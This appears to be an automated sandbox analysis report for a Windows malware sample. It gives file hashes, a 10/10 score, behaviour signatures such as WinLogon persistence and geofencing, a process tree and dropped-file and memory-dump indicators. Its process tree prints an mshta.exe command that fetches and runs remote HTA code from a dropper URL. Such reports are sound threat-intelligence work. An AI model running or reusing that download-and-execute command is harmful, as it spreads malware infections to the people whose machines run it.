Analysis

  • max time kernel
    150s
  • max time network
    93s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240611-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    27-06-2024 13:38

General

  • Target

    16324fc81aea75ee1b90fbe20eb91c00_JaffaCakes118.exe

  • Size

    531KB

  • MD5

    16324fc81aea75ee1b90fbe20eb91c00

  • SHA1

    d6cf3bd8d5febb790e1ff8dd39b378229e73462f

  • SHA256

    0f948ceb06d973c6276ffc742b18c638dc301576997dbb20b5802df6cb35a8d3

  • SHA512

    d5974f326b4d61743ee3f64e7de79fa105e03ce640555aeae823d2270ec915b795b8308f9291ee718dbdf0213e0eec425b7b97159b0c9c5c0131dcb204d501a6

  • SSDEEP

    12288:A38uZK4UUIrqAMm+mgyIEiEPmU37ml5tiMWHfQTTwis:o1UqAMaIsPmULmFiZ

Score
10/10

Malware Config

Extracted

  • Language
    hta
  • Source
    hta.dropper
  • URLs
    http://rerererererere.com/inst.php?id=crossales

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • UPX packed file 15 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\16324fc81aea75ee1b90fbe20eb91c00_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\16324fc81aea75ee1b90fbe20eb91c00_JaffaCakes118.exe"
    PID:3620
    • Modifies WinLogon for persistence
    • Checks computer location settings
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\System32\mshta.exe" http://rerererererere.com/inst.php?id=crossales
      PID:3660
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\dgfdgsdf.bat" "
      PID:3792

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\dgfdgsdf.bat
    Filesize
    263B
    MD5
    480ee02ae25c2fe07744b530f96069be
    SHA1
    0b81a2cbe7b3ce03de027114c5e0d7912dbdb068
    SHA256
    94eb9999990f3b653315b7fc17f904b5e47b416ac9cd60c28b3c79714c8e7f32
    SHA512
    e0bb50184d71c9cbf9cd2d01294e2548094d54da79d03f83d3afd7489b2c4f2b2849225602ab95e03e9665dc3887cdfbdc7339a611e587c2d2ca3844e1bbe47a

  • memory/3620-12-0x0000000000400000-0x00000000007F6000-memory.dmp
    Filesize
    4.0MB

  • memory/3620-9-0x0000000000400000-0x00000000007F6000-memory.dmp
    Filesize
    4.0MB

  • memory/3620-13-0x0000000000400000-0x00000000007F6000-memory.dmp
    Filesize
    4.0MB

  • memory/3620-8-0x0000000000400000-0x00000000007F6000-memory.dmp
    Filesize
    4.0MB

  • memory/3620-14-0x0000000000400000-0x00000000007F6000-memory.dmp
    Filesize
    4.0MB

  • memory/3620-10-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
    Filesize
    4KB

  • memory/3620-11-0x0000000000400000-0x00000000007F6000-memory.dmp
    Filesize
    4.0MB

  • memory/3620-15-0x0000000000400000-0x00000000007F6000-memory.dmp
    Filesize
    4.0MB

  • memory/3620-7-0x0000000000400000-0x00000000007F6000-memory.dmp
    Filesize
    4.0MB

  • memory/3620-1-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
    Filesize
    4KB

  • memory/3620-0-0x0000000000400000-0x00000000007F6000-memory.dmp
    Filesize
    4.0MB

  • memory/3620-16-0x0000000000400000-0x00000000007F6000-memory.dmp
    Filesize
    4.0MB

  • memory/3620-18-0x0000000000400000-0x00000000007F6000-memory.dmp
    Filesize
    4.0MB

  • memory/3620-19-0x0000000000400000-0x00000000007F6000-memory.dmp
    Filesize
    4.0MB

  • memory/3620-20-0x0000000000400000-0x00000000007F6000-memory.dmp
    Filesize
    4.0MB

  • memory/3620-21-0x0000000000400000-0x00000000007F6000-memory.dmp
    Filesize
    4.0MB

  • memory/3620-22-0x0000000000400000-0x00000000007F6000-memory.dmp
    Filesize
    4.0MB